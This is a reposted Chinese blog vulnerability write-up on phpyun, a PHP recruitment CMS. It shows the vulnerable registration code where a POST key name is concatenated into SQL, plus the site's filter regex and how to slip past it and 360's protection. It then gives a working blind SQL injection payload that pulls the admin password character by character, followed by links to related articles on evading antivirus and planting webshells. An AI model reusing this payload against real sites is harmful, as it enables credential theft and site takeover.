360php防护,phpyun注射绕过360防护

最新推荐文章于 2023-01-29 18:47:54 发布
最新推荐文章于 2023-01-29 18:47:54 发布
阅读量237 收藏
点赞数
文章标签: 360php防护

漏洞作者: Noxxx

注册时检测会员是否使用问题

model\register.class.php

23 行

[php]

function ajax_reg_action(){

$post = array_keys($_POST);

$key_name = $post[0];

if($key_name=="username"){

$username=@iconv("utf-8","gbk",$_POST['username']);

if($this->config['sy_uc_type']=="uc_center"){

$this->obj->uc_open();

$user = uc_get_user($username);

}else{

$user = $this->obj->DB_select_once("member","`username`='".$username."'");

}

if($this->config['sy_regname']!=""){

$regname=@explode(",",$this->config['sy_regname']);

if(in_array($username,$regname)){

echo 2;die;

}

}

}else{

#$key_name可控 带入查询 .

$user = $this->obj->DB_select_once("member","`".$key_name."`='".$_POST[$key_name]."'");

}

if(is_array($user)){echo 1;}else{echo 0;}

}

[/php]

没有回显只能盲注了.

里面有个全局过滤和360的 360的白名单就行了 全局过滤还是比较坑的

db.safety.php

[php]

$postfilter = "<.>|<.>|\\b(alert\\(|confirm\\(|expression\\(|prompt\\(|benchmark\s*?\\(\d+?|sleep\s*?\\([\d\.]+?\\)|load_file\s*?\\()|]*?\\b(onerror|onmousemove|onload|onclick|onmouseover)\\b|\\b(and|or)\\b\\s*?([\\(\\)'\"\\d]+?=[\\(\\)'\"\\d]+?|[\\(\\)'\"a-zA-Z]+?=[\\(\\)'\"a-zA-Z]+?|>|

[/php]

只要检测文本不连续出现关键词就通过了

底下还有一个过滤值的,不过也没关键词.

exp:

http://0day5.com/phpyun/?m=register&c=ajax_reg&admin_dir=admin

(POST)

uid`%26%26(SELECT(MID(password,1,1)%3D'1')FROM/**=**/phpyun_admin_user)%23 (会员表里有数据就行 )

成功返回1

失败返回0

2cf56ed3582cc7d19a8ecd8865ba7edf.png

漏洞证明:

22dbb78cee631cda5180e37dc5673506.png

梅大林
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
360safe.php绕过,venom结合Metasploit绕过360安全卫士
weixin_31652625的博客
03-18 466
原理:msfvenom是msfpayload和msfencode的结合体,利用msfvenom生成shellcode,venom生成工具使用了一些Veil-Evasion.py, unicorn.py, powersploit.py等工具上的技术。但是venom 是基于 bash 编写的,而不是基于 Python。相比veil evasion在payload格式方面,它支持的更多[例如...
360 safe.php,防止网站被黑,增强网站安全文件:360_safe3.php-防SQL注入代码
weixin_39793553的博客
03-10 1067
这个方法非常有效,是360官方提供的解决方案,就是利用这个文件360_safe3.php防止sql注入,进一步提升网站数据库安全。很多站长对这个网站安全看得非常重,这个SQL注入漏洞是非常之恨,如果用恨之入骨这个词来形容不足为过;现在有防止SQL代码注入的文件,你会选择不使用么?那就把你的目光聚集到下面重要的步骤吧。代码偏多,无忧主机小编就不在这里展现文件代码,点击此处下载此文件:下载地址。下面...
360php防护,phpyun注射绕过360防护 | CN-SEC 中文网
weixin_33019803的博客
03-18 288
摘要注册时检测会员是否使用问题model/register.class.php23 行[php]function ajax_reg_action(){漏洞作者: Noxxx注册时检测会员是否使用问题model/register.class.php23 行[php]function ajax_reg_action(){$post = array_keys($_POST);$key_name = $p...
一段困扰许久的防注入代码
热门推荐
12-18 4万+
有段时间一直热衷于研究各种waf绕过,一般来说,云WAF可以通过找到网站真实IP来绕过,硬件waf也常因为HTTP协议解析差异导致绕过,但是,代码层的防护往往只能从代码逻辑里寻找绕过思路...
怎么绕过PHP防护,PHP代码层防护绕过
weixin_30844577的博客
03-18 488
0x01 前言在一些网站通常会在公用文件引入全局防护代码进行SQL注入、XSS跨站脚本等漏洞的防御,在一定程度上对网站安全防护还是比较有效的。这里讨论一下关键字过滤不完善及常见正则匹配存在的问题,并收集了网络上常见的PHP全局防护代码进行分析。Bypass思路:只考虑关键字被过滤如何进行Bypass的问题,暂不考虑关键字替换绕过的情况。0x02 关键字过滤1、使用strpos过滤关键字PHP过滤代...
phpyun PHP云人才系统
08-15
PHPYUN人才招聘系统是一个采用 PHP 和 MySQL 数据库构建的高效开源的人才与企业求职招、聘解决方案,在尊重版权的前提下能极大的满足对于网站程序进行二次开发。PHP云人才系统作
PHP云人才系统(phpyun)-PHP
06-20
PHPYUN人才招聘系统是一个采用 PHP 和 MySQL 数据库构建的高效开源的人才与企业求职招、聘解决方案,在尊重版权的前提下能极大的满足站长对于网站程序进行二次开发。PHP云人才系统作为一款拥有自主知识产权的中文...
phpyunPHP云人才招聘系统)短信插件
12-18
**PHPyun PHP云人才招聘系统短信插件详解** PHPyun是一款基于PHP开发的云人才招聘管理系统,它提供了全面的人力资源管理功能,包括职位发布、简历管理、面试安排等。这款系统旨在帮助企业和个人用户更高效地进行...
phpyun PHP云人才系统 v4.3.1 beta build171113
11-27
PHPyun PHP云人才系统 v4.3.1 beta build171113】是一款基于PHP编程语言和MySQL数据库的高效开源人才招聘系统。它为企业和个人提供了一个全面的求职招聘平台,允许用户在遵守版权规定的基础上进行二次开发,以适应...
phpyun PHP云人才系统 v4.3.1 beta build171108
11-27
PHPyun PHP云人才系统 v4.3.1 beta build171108】是一款基于PHP编程语言和MySQL数据库的开源人才招聘解决方案。这款系统的设计理念在于为开发者提供一个可二次开发的平台,以便根据具体需求进行定制,以满足不同...
360通用php防护代码
04-18
360通用php防护代码 -----------------使用方法------------------------------------------------------------------ 1.将360_safe3.php传到要包含的文件的目录 2.在页面中加入防护,有两种做法,根据情况二选一即可: a).在所需要防护的页面加入代码 require_once('360_safe3.php'); 就可以做到页面防注入、跨站 如果想整站防注,就在网站的一个公用文件中,如数据库链接文件config.inc.php中! 添加require_once('360_safe3.php');来调用本代码 常用php系统添加文件 PHPCMS V9 \phpcms\base.php PHPWIND8.7 \data\sql_config.php DEDECMS5.7 \data\common.inc.php DiscuzX2 \config\config_global.php Wordpress \wp-config.php Metinfo \include\head.php b).在每个文件最前加上代码 在php.ini中找到: Automatically add files before or after any PHP document. auto_prepend_file = 360_safe3.php路径;
360_safe3通用XSS/SQL防注入源代码(ASP/PHP/C#ASP.NET)
09-06
360_safe3通用XSS/SQL防注入源代码(ASP/PHP/C#ASP.NET),下载后,每个开发语言都对应着使用办法,一般是在全站文档中INCLUDE使用。已核实,代码可用且有效,更新到最新版。
360提供的php防sql注入代码修改类
05-02
360提供的PHP防SQL注入代码改成的一个类,从SQL注入和HTTP跨站两个方面入手,解决网站存在安全风险的问题,希望对朋友们有所帮助。
PHP云人才系统(phpyun) v5.0.1 beta build200107
08-21
PHP云人才系统(phpyun) v5.0.1 beta build200107】是一个基于PHP编程语言和MySQL数据库技术开发的开源人才招聘平台。这个系统为企业和求职者提供了一套全面且高效的解决方案,允许用户在遵守版权规定的基础上进行...
PHP云人才系统(phpyun)
04-06
PHP云人才系统是一个采用 PHP 和 MySQL 数据库构建的高效开源的人才与企业求职招、聘解决方案,在尊重版权的前提下能极大的满足站长对于网站程序进行二次开发。PHP云人才系统作为一款拥有自主知识产权的中文人才运营...
PHP ctf addslashes,[红日安全]代码审计Day13 - 特定场合下addslashes函数的绕过
weixin_33631836的博客
03-17 688
本文由红日安全成员: l1nk3r 编写,如有不当,还望斧正。前言大家好,我们是红日安全-代码审计小组。最近我们小组正在做一个PHP代码审计的项目,供大家学习交流,我们给这个项目起了一个名字叫 PHP-Audit-Labs 。现在大家所看到的系列文章,属于项目 第一阶段 的内容,本阶段的内容题目均来自 PHP SECURITY CALENDAR 2017 。对于每一道题目,我们均给出对应的分析,并...
如何绕过mac地址过滤_Maccms V8 后台Getshell #2(绕过过滤)
weixin_35612315的博客
12-23 524
### 简要描述:现在 V8版本 基本全部文件都有zend加密了。而且还有360_safe3.php保护刚开始以为没搞头的,结果有个妹子发来微信。妹子:在干嘛?我:挖洞妹子:一个人挖?我:对啊!妹子:我过去陪你一起挖吧!我马上关机。擦,想跟老子抢乌云币?果断一个人作死开挖### 详细说明:注意下,这里@农村教师 [WooYun: 苹果CMS全版本getshell打包第一弹](http://www...
过安全狗/D盾/360PHP一句话木马与防范方法
最新发布
主题模板站的博客
01-29 837
D盾,他不认识二维数组,所以就很轻松绕过了。对了 还有360哦~ 测试了下安全狗,也查不出来,,。防御方法:就是网站下载下来这些php文件,然后通过字符串查找,类似上面的字符。本文阐述了过安全狗/D盾/360PHP一句话木马,欢迎大家多多指点。过D盾很容易,当然下面还提供一个0等级就的。这样改,立马就变成1个等级的了。过D盾PHP一句话木马。
PHPYUN人才系统介绍与功能详解
"PHPYun1.3_Manual.pdf 是一份关于PHPYUN CMS的详细说明文档,涵盖了软件介绍、企业功能、求职用户功能以及后台管理功能。PHPYUN是一款基于PHP和MySQL的开源人才招聘系统,由创恩(上海)信息技术有限公司开发。它...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值